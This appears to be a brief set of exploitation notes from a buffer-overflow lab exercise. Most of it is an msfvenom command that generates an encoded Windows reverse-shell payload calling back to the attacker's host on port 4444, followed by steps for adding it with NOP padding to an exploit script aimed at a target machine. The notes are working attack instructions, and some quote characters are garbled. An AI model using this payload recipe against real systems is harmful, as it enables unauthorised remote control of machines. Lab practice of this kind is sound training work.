- Generate reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=<my ip> LPORT=4444 -f c -e x86/shikata_ga_nai -b "\x00ā
-f c for filetype in c
-b ā\x00ā for bad characters if there is more badchars than \x00 then added it here
- Add payload and NOP or padding \x90 in the script.py and change the IP value to target machine.
Final script
Will receive reverse shell successfully